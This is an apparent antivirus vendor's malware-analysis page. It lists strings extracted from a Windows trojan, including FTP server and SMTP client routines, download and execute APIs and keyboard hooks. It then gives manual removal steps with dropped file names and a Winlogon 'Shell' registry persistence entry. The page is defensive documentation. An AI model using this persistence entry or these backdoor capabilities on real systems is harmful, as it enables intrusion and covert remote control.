@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage
@Smtpprot@TCustomSmtpClient@WSocketDataAvailable$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDataSent$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDnsLookupDone$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionClosed$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionConnected$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage
@Smtpprot@TSmtpCli@
@Smtpprot@TSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSmtpCli@$bdtr$qqrv
@Smtpprot@TSmtpCli@Data$qqrv
@Smtpprot@TSmtpCli@PrepareEMail$qqrv
@Smtpprot@TSmtpCli@SetEMailFiles$qqrp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerAttachContentType$qqrir17System@AnsiStringt2
@Smtpprot@TSmtpCli@TriggerAttachHeader$qqri17System@AnsiStringp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerGetData$qqripciro
@Smtpprot@TSmtpCli@TriggerHeaderLine$qqrpci
@Smtpprot@TSyncSmtpCli@
@Smtpprot@TSyncSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSyncSmtpCli@AbortSync$qqrv
@Smtpprot@TSyncSmtpCli@ConnectSync$qqrv
@Smtpprot@TSyncSmtpCli@DataSync$qqrv
@Smtpprot@TSyncSmtpCli@HeloSync$qqrv
@Smtpprot@TSyncSmtpCli@MailFromSync$qqrv
@Smtpprot@TSyncSmtpCli@MailSync$qqrv
@Smtpprot@TSyncSmtpCli@OpenSync$qqrv
@Smtpprot@TSyncSmtpCli@QuitSync$qqrv
@Smtpprot@TSyncSmtpCli@RcptToSync$qqrv
@Smtpprot@TSyncSmtpCli@RsetSync$qqrv
@Smtpprot@TSyncSmtpCli@Synchronize$qqrynpqqrv$v
@Smtpprot@TSyncSmtpCli@VrfySync$qqrv
@Smtpprot@TSyncSmtpCli@WaitUntilReady$qqrv
@Smtpprot@initialization$qqrv
@Wsocket@TCustomSocksWSocket@SetSocksPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@GetPeerPort$qqrv
@Wsocket@TCustomWSocket@GetRemotePort$qqrv
@Wsocket@TCustomWSocket@GetXPort$qqrv
@Wsocket@TCustomWSocket@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Wsocket@TCustomWSocket@SetLocalPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@SetRemotePort$qqr17System@AnsiString
@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
WindowState
CreatePipe
GetProcessHeap
WinExec
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryInfoKeyA
SetViewportOrgEx
ShellExecuteA
URLDownloadToFileA
ActivateKeyboardLayout
EnumThreadWindows
EnumWindows
ExitWindowsEx
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardType
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
keybd_event
`.data
.rdata
P.idata
@.edata
@.rsrc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    NET.exe:640
    NET.exe:1860
    fservice.exe:220
    net1.exe:1072
    net1.exe:1972

  2. Delete the original Virus file.
  3. Delete or disinfect the following files created/modified by the Virus:

    %WinDir%\services.exe (2105 bytes)
    %WinDir%\system\sservice.exe (2105 bytes)
    %System%\fservice.exe (2105 bytes)

  4. Remove the references to the Virus by modifying the following registry value(s) (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "Explorer.exe %System%\fservice.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now